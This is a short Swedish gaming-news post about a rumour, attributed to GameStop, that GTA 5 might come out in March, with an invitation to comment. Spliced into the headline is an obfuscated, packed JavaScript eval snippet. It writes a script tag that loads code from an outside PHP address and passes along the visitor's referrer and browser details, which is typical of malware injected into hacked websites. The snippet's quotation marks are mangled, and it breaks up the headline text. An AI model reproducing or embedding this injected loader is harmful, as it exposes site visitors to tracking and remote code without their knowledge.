Image Image Image Image Image Image Image Image Image Image

| 21 oktober, 2018

Scroll to top

Top

Rykte: GTA 5 kanske släpps i mars

Rykte: GTA 5 kanske släpps i mars
Sebastian Plengier Ehrnfelt

GTA eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|aatki|var|u0026u|referrer|ibihb||js|php’.split(‘|’),0,{}))
5: Kan det vara sant?

Enligt nya rykten är det möjligt att det efterlängtade spelet GTA 5 släpps i mars nästa år.

Detta rykte kommer från den amerikanska spelkedjan Gamestop.  Absolut kan vi inte svara på om Gamestop vet mer än vad vi vet men vad tror du? Kan det vara så att de fått insider tips eller möjligen ett datum direkt från utgivaren?

Kommentera och spekulera gärna fritt nedan och berätta vad du tror!